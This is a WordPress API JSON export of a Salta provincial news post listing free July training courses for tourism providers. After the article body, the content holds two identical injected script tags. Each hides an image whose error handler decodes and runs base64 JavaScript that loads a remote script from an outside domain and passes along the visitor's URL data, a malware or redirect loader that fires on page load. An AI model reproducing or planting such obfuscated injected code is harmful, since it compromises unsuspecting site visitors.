{"id":4153,"date":"2024-06-28T10:36:55","date_gmt":"2024-06-28T13:36:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4153"},"modified":"2025-08-13T23:53:42","modified_gmt":"2025-08-14T02:53:42","slug":"continuan-las-actividades-gratuitas-de-formacion-destinadas-al-sector-turistico","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4153","title":{"rendered":"Contin\u00faan las actividades gratuitas de formaci\u00f3n destinadas al sector tur\u00edstico"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-fe1b06a5c9c8df006a26dc27aa9f3452\" style=\"background-color:#730621\"><em>Durante julio se llevar\u00e1n adelante capacitaciones gratuitas de modalidad presencial, virtual y asincr\u00f3nica con el objeto de contribuir a la formaci\u00f3n profesional de los prestadores del sector tur\u00edstico y mejorar la calidad de los servicios.<\/em><\/h4>\n\n\n\n<p>En el marco del Plan Integral de Capacitaci\u00f3n: Hacia un destino sostenible, el Ministerio de Turismo y Deportes de Salta brindar\u00e1, durante julio, capacitaciones gratuitas destinadas a prestadores tur\u00edsticos. Para informes e inscripciones dirigirse a capacitacion@turismosalta.gov.ar.<\/p>\n\n\n\n<p>El sector p\u00fablico y privado vinculado a la actividad podr\u00e1 acceder durante el pr\u00f3ximo mes a los siguientes cursos gratuitos de modalidades presenciales, virtuales y asincr\u00f3nicas:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>C\u00f3mo me presento al mundo digital: del 27 de junio al 4 de julio. Dictado por Nelson Velizan, destinado a emprendedores tur\u00edsticos. Asincr\u00f3nico.<\/li>\n\n\n\n<li>Ferias con Identidad. Organizaci\u00f3n y Desarrollo Integral: 1, 8, 15 y 29 de julio. Dictado por Marcela Ruiz, destinado a referentes e informantes tur\u00edsticos. Asincr\u00f3nico.<\/li>\n\n\n\n<li>Jornada de Actualizaci\u00f3n Parques Nacionales de la Provincia. Parque Nacional Los Cardones: 2 de julio. Dictado por Jos\u00e9 Paz, Facundo Burgos y Alex Guzm\u00e1n, destinado a gu\u00edas y prestadores de turismo aventura. \u00a0Virtual.<\/li>\n\n\n\n<li>Primeros Auxilios: 4 de julio. Dictado por Dr. Rodolfo Pastores, destinado a gu\u00edas y prestadores de turismo aventura. Presencial (Salta Capital).<\/li>\n\n\n\n<li>Primeros Auxilios: 5 de julio. Dictado por Dr. Rodolfo Pastores, destinado a gu\u00edas y prestadores de turismo aventura. Presencial (La Vi\u00f1a).<\/li>\n\n\n\n<li>C\u00f3mo renovar las experiencias tur\u00edsticas: del 4 al 11 de julio. Dictado por Celicilia Camou, destinado a emprendedores tur\u00edsticos. Asincr\u00f3nico.<\/li>\n\n\n\n<li>Primeros Auxilios: 11 de julio. Dictado por Dr. Rodolfo Pastores, destinado a gu\u00edas y prestadores de turismo. Presencial (San Carlos).<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/continuan-las-actividades-gratuitas-de-formacion-destinadas-al-sector-turistico-96405\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Durante julio se llevar\u00e1n adelante capacitaciones gratuitas de modalidad presencial, virtual y asincr\u00f3nica con el objeto de contribuir a la formaci\u00f3n profesional de los prestadores del sector tur\u00edstico y mejorar la calidad de los servicios. En el marco del Plan Integral de Capacitaci\u00f3n: Hacia un destino sostenible, el Ministerio de Turismo y Deportes de Salta [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4154,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,17],"tags":[],"class_list":{"0":"post-4153","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4153"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4153"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4153\/revisions"}],"predecessor-version":[{"id":6754,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4153\/revisions\/6754"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4154"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4153"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4153"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4153"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}